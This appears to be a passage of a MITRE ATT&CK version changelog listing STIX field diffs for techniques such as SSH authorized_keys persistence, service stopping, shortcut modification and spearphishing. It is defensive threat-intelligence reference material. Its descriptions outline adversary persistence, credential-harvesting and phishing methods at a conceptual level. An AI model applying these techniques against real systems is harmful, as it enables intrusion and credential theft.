| description | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.
SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd) | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys (or, on ESXi, `/etc/ssh/keys-/authorized_keys`).(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH.(Citation: Broadcom ESXi SSH) The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.
SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd) |
| x_mitre_version | 1.3 | 1.4 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Broadcom ESXi SSH', 'description': 'Broadcom. (2024, December 12). Allowing SSH access to VMware vSphere ESXi/ESX hosts with public/private key authentication. Retrieved March 26, 2025.', 'url': 'https://knowledge.broadcom.com/external/article/313767/allowing-ssh-access-to-vmware-vsphere-es.html'} |
| x_mitre_platforms | | ESXi |
[T1563.001] Remote Service Session Hijacking: SSH Hijacking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['root'] | |
| x_mitre_system_requirements | ['SSH service enabled, trust relationships configured, established connections'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-23 23:11:24.682000+00:00 | 2025-04-15 21:40:37.838000+00:00 |
| external_references[3]['description'] | Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017. | Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking | https://web.archive.org/web/20210311184303/https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking/ |
| external_references[4]['description'] | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020. | Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident | https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/ |
| x_mitre_version | 1.0 | 1.1 |
[T1562.009] Impair Defenses: Safe Mode Boot
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host Intrusion Prevention Systems', 'Anti-virus'] | |
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-31 14:51:47.352000+00:00 | 2025-04-15 19:58:15.415000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1053.005] Scheduled Task/Job: Scheduled Task
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-13 16:13:47.770000+00:00 | 2025-04-15 19:58:01.010000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
[T1053] Scheduled Task/Job
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['SYSTEM', 'Administrator', 'User'] | |
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:14:03.453000+00:00 | 2025-04-15 21:41:11.473000+00:00 |
| x_mitre_remote_support | True | False |
| x_mitre_version | 2.3 | 2.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1546.002] Event Triggered Execution: Screensaver
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-28 18:17:34.185000+00:00 | 2025-04-16 20:37:21.356000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1547.005] Boot or Logon Autostart Execution: Security Support Provider
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-25 15:42:48.910000+00:00 | 2025-04-15 19:58:30.225000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1505] Server Software Component
Current version: 1.5
Version changed from: 1.4 → 1.5
New Mitigations:
New Detections:
- DS0017: Command (Command Execution)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-19 21:18:29.349000+00:00 | 2025-04-16 20:37:21.713000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_data_sources | | Command: Command Execution |
| x_mitre_platforms | | ESXi |
[T1648] Serverless Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:59:17.861000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1569.002] System Services: Service Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:41:40.247000+00:00 | 2025-04-15 19:59:20.444000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1489] Service Stop
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may stop or disable services on a system to rend | t | Adversaries may stop or disable services on a system to rend |
| er those services unavailable to legitimate users. Stopping | | er those services unavailable to legitimate users. Stopping |
| critical services or processes can inhibit or stop response | | critical services or processes can inhibit or stop response |
| to an incident or aid in the adversary's overall objectives | | to an incident or aid in the adversary's overall objectives |
| to cause damage to the environment.(Citation: Talos Olympic | | to cause damage to the environment.(Citation: Talos Olympic |
| Destroyer 2018)(Citation: Novetta Blockbuster) Adversaries | | Destroyer 2018)(Citation: Novetta Blockbuster) Adversaries |
| may accomplish this by disabling individual services of hig | | may accomplish this by disabling individual services of hig |
| h importance to an organization, such as <code>MSExchangeIS< | | h importance to an organization, such as <code>MSExchangeIS< |
| /code>, which will make Exchange content inaccessible.(Citat | | /code>, which will make Exchange content inaccessible.(Citat |
| ion: Novetta Blockbuster) In some cases, adversaries may sto | | ion: Novetta Blockbuster) In some cases, adversaries may sto |
| p or disable many or all services to render systems unusable | | p or disable many or all services to render systems unusable |
| .(Citation: Talos Olympic Destroyer 2018) Services or proces | | .(Citation: Talos Olympic Destroyer 2018) Services or proces |
| ses may not allow for modification of their data stores whil | | ses may not allow for modification of their data stores whil |
| e running. Adversaries may stop services or processes in ord | | e running. Adversaries may stop services or processes in ord |
| er to conduct [Data Destruction](https://attack.mitre.org/te | | er to conduct [Data Destruction](https://attack.mitre.org/te |
| chniques/T1485) or [Data Encrypted for Impact](https://attac | | chniques/T1485) or [Data Encrypted for Impact](https://attac |
| k.mitre.org/techniques/T1486) on the data stores of services | | k.mitre.org/techniques/T1486) on the data stores of services |
| like Exchange and SQL Server.(Citation: SecureWorks WannaCr | | like Exchange and SQL Server, or on virtual machines hosted |
| y Analysis) | | on ESXi infrastructure.(Citation: SecureWorks WannaCry Anal |
| | | ysis)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021 |
| | | ) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-12 15:57:27.380000+00:00 | 2025-04-15 19:58:12.942000+00:00 |
| description | Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis) | Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure.(Citation: SecureWorks WannaCry Analysis)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021) |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
| x_mitre_platforms | | ESXi |
[T1574.010] Hijack Execution Flow: Services File Permissions Weakness
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_effective_permissions | ['SYSTEM', 'Administrator', 'User'] | |
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:37.026000+00:00 | 2025-04-16 20:37:18.533000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1574.011] Hijack Execution Flow: Services Registry Permissions Weakness
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application Control'] | |
| x_mitre_effective_permissions | ['SYSTEM'] | |
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:42:48.016000+00:00 | 2025-04-15 19:58:09.308000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-15 18:43:20.995000+00:00 | 2025-04-16 20:37:17.707000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
[T1129] Shared Modules
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-12 21:17:14.868000+00:00 | 2025-04-15 19:58:04.668000+00:00 |
| x_mitre_version | 2.2 | 2.3 |
[T1547.009] Boot or Logon Autostart Execution: Shortcut Modification
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may create or modify shortcuts that can execute | t | Adversaries may create or modify shortcuts that can execute |
| a program during system boot or user login. Shortcuts or sym | | a program during system boot or user login. Shortcuts or sym |
| bolic links are used to reference other files or programs th | | bolic links are used to reference other files or programs th |
| at will be opened or executed when the shortcut is clicked o | | at will be opened or executed when the shortcut is clicked o |
| r executed by a system startup process. Adversaries may abu | | r executed by a system startup process. Adversaries may abu |
| se shortcuts in the startup folder to execute their tools an | | se shortcuts in the startup folder to execute their tools an |
| d achieve persistence.(Citation: Shortcut for Persistence ) | | d achieve persistence.(Citation: Shortcut for Persistence ) |
| Although often used as payloads in an infection chain (e.g. | | Although often used as payloads in an infection chain (e.g. |
| [Spearphishing Attachment](https://attack.mitre.org/techniqu | | [Spearphishing Attachment](https://attack.mitre.org/techniqu |
| es/T1566/001)), adversaries may also create a new shortcut a | | es/T1566/001)), adversaries may also create a new shortcut a |
| s a means of indirection, while also abusing [Masquerading]( | | s a means of indirection, while also abusing [Masquerading]( |
| https://attack.mitre.org/techniques/T1036) to make the malic | | https://attack.mitre.org/techniques/T1036) to make the malic |
| ious shortcut appear as a legitimate program. Adversaries ca | | ious shortcut appear as a legitimate program. Adversaries ca |
| n also edit the target path or entirely replace an existing | | n also edit the target path or entirely replace an existing |
| shortcut so their malware will be executed instead of the in | | shortcut so their malware will be executed instead of the in |
| tended legitimate program. Shortcuts can also be abused to | | tended legitimate program. Shortcuts can also be abused to |
| establish persistence by implementing other methods. For exa | | establish persistence by implementing other methods. For exa |
| mple, LNK browser extensions may be modified (e.g. [Browser | | mple, LNK browser extensions may be modified (e.g. [Browser |
| Extensions](https://attack.mitre.org/techniques/T1176)) to p | | Extensions](https://attack.mitre.org/techniques/T1176/001)) |
| ersistently launch malware. | | to persistently launch malware. |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 13:41:16.110000+00:00 | 2025-04-15 19:58:28.507000+00:00 |
| description | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware. | Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176/001)) to persistently launch malware. |
| x_mitre_version | 1.2 | 1.3 |
[T1558.002] Steal or Forge Kerberos Tickets: Silver Ticket
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-25 21:46:46.831000+00:00 | 2025-04-15 19:59:10.698000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1072] Software Deployment Tools
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:49:37.227000+00:00 | 2025-04-15 19:58:51.465000+00:00 |
| x_mitre_version | 3.1 | 3.2 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1518] Software Discovery
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 00:16:06.689000+00:00 | 2025-04-15 19:59:16.123000+00:00 |
| x_mitre_version | 1.4 | 1.5 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1027.002] Obfuscated Files or Information: Software Packing
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Heuristic detection', 'Signature-based detection'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:48.113000+00:00 | 2025-04-16 20:37:22.038000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1036.006] Masquerading: Space after Filename
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:52.873000+00:00 | 2025-04-16 20:37:22.189000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1598.002] Phishing for Information: Spearphishing Attachment
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may send spearphishing messages with a malicious | t | Adversaries may send spearphishing messages with a malicious |
| attachment to elicit sensitive information that can be used | | attachment to elicit sensitive information that can be used |
| during targeting. Spearphishing for information is an attem | | during targeting. Spearphishing for information is an attem |
| pt to trick targets into divulging information, frequently c | | pt to trick targets into divulging information, frequently c |
| redentials or other actionable information. Spearphishing fo | | redentials or other actionable information. Spearphishing fo |
| r information frequently involves social engineering techniq | | r information frequently involves social engineering techniq |
| ues, such as posing as a source with a reason to collect inf | | ues, such as posing as a source with a reason to collect inf |
| ormation (ex: [Establish Accounts](https://attack.mitre.org/ | | ormation (ex: [Establish Accounts](https://attack.mitre.org/ |
| techniques/T1585) or [Compromise Accounts](https://attack.mi | | techniques/T1585) or [Compromise Accounts](https://attack.mi |
| tre.org/techniques/T1586)) and/or sending multiple, seemingl | | tre.org/techniques/T1586)) and/or sending multiple, seemingl |
| y urgent messages. All forms of spearphishing are electroni | | y urgent messages. All forms of spearphishing are electroni |
| cally delivered social engineering targeted at a specific in | | cally delivered social engineering targeted at a specific in |
| dividual, company, or industry. In this scenario, adversarie | | dividual, company, or industry. In this scenario, adversarie |
| s attach a file to the spearphishing email and usually rely | | s attach a file to the spearphishing email. In some cases, t |
| upon the recipient populating information then returning the | | hey may rely upon the recipient populating information, then |
| file.(Citation: Sophos Attachment)(Citation: GitHub Phisher | | returning the file.(Citation: Sophos Attachment)(Citation: |
| y) The text of the spearphishing email usually tries to give | | GitHub Phishery) The text of the spearphishing email usually |
| a plausible reason why the file should be filled-in, such a | | tries to give a plausible reason why the file should be fil |
| s a request for information from a business associate. Adver | | led-in, such as a request for information from a business as |
| saries may also use information from previous reconnaissance | | sociate. In other cases, adversaries may leverage techniques |
| efforts (ex: [Search Open Websites/Domains](https://attack. | | such as [HTML Smuggling](https://attack.mitre.org/technique |
| mitre.org/techniques/T1593) or [Search Victim-Owned Websites | | s/T1027/006) to harvest user credentials via fake login port |
| ](https://attack.mitre.org/techniques/T1594)) to craft persu | | als.(Citation: Huntress HTML Smuggling 2024) Adversaries ma |
| asive and believable lures. | | y also use information from previous reconnaissance efforts |
| | | (ex: [Search Open Websites/Domains](https://attack.mitre.org |
| | | /techniques/T1593) or [Search Victim-Owned Websites](https:/ |
| | | /attack.mitre.org/techniques/T1594)) to craft persuasive and |
| | | believable lures. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-05-31 04:18:44.568000+00:00 | 2025-04-15 19:58:49.390000+00:00 |
| description | Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. | Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email. In some cases, they may rely upon the recipient populating information, then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. In other cases, adversaries may leverage techniques such as [HTML Smuggling](https://attack.mitre.org/techniques/T1027/006) to harvest user credentials via fake login portals.(Citation: Huntress HTML Smuggling 2024)
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. |
| external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Huntress HTML Smuggling 2024', 'description': 'Matt Kiely. (2024, July 5). Smuggler’s Gambit: Uncovering HTML Smuggling Adversary in the Middle Tradecraft. Retrieved March 18, 2025.', 'url': 'https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft'} |
[T1566.004] Phishing: Spearphishing Voice
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may use voice communications to ultimately gain | t | Adversaries may use voice communications to ultimately gain |
| access to victim systems. Spearphishing voice is a specific | | access to victim systems. Spearphishing voice is a specific |
| variant of spearphishing. It is different from other forms o | | variant of spearphishing. It is different from other forms o |
| f spearphishing in that is employs the use of manipulating a | | f spearphishing in that is employs the use of manipulating a |
| user into providing access to systems through a phone call | | user into providing access to systems through a phone call |
| or other forms of voice communications. Spearphishing freque | | or other forms of voice communications. Spearphishing freque |
| ntly involves social engineering techniques, such as posing | | ntly involves social engineering techniques, such as posing |
| as a trusted source (ex: [Impersonation](https://attack.mitr | | as a trusted source (ex: [Impersonation](https://attack.mitr |
| e.org/techniques/T1656)) and/or creating a sense of urgency | | e.org/techniques/T1656)) and/or creating a sense of urgency |
| or alarm for the recipient. All forms of phishing are elect | | or alarm for the recipient. All forms of phishing are elect |
| ronically delivered social engineering. In this scenario, ad | | ronically delivered social engineering. In this scenario, ad |
| versaries are not directly sending malware to a victim vice | | versaries are not directly sending malware to a victim vice |
| relying on [User Execution](https://attack.mitre.org/techniq | | relying on [User Execution](https://attack.mitre.org/techniq |
| ues/T1204) for delivery and execution. For example, victims | | ues/T1204) for delivery and execution. For example, victims |
| may receive phishing messages that instruct them to call a p | | may receive phishing messages that instruct them to call a p |
| hone number where they are directed to visit a malicious URL | | hone number where they are directed to visit a malicious URL |
| , download malware,(Citation: sygnia Luna Month)(Citation: C | | , download malware,(Citation: sygnia Luna Month)(Citation: C |
| ISA Remote Monitoring and Management Software) or install ad | | ISA Remote Monitoring and Management Software) or install ad |
| versary-accessible remote management tools ([Remote Access S | | versary-accessible remote management tools ([Remote Access T |
| oftware](https://attack.mitre.org/techniques/T1219)) onto th | | ools](https://attack.mitre.org/techniques/T1219)) onto their |
| eir computer.(Citation: Unit42 Luna Moth) Adversaries may a | | computer.(Citation: Unit42 Luna Moth) Adversaries may also |
| lso combine voice phishing with [Multi-Factor Authentication | | combine voice phishing with [Multi-Factor Authentication Re |
| Request Generation](https://attack.mitre.org/techniques/T16 | | quest Generation](https://attack.mitre.org/techniques/T1621) |
| 21) in order to trick users into divulging MFA credentials o | | in order to trick users into divulging MFA credentials or a |
| r accepting authentication prompts.(Citation: Proofpoint Vis | | ccepting authentication prompts.(Citation: Proofpoint Vishin |
| hing) | | g) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:06:47.134000+00:00 | 2025-04-15 19:59:02.243000+00:00 |
| description | Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
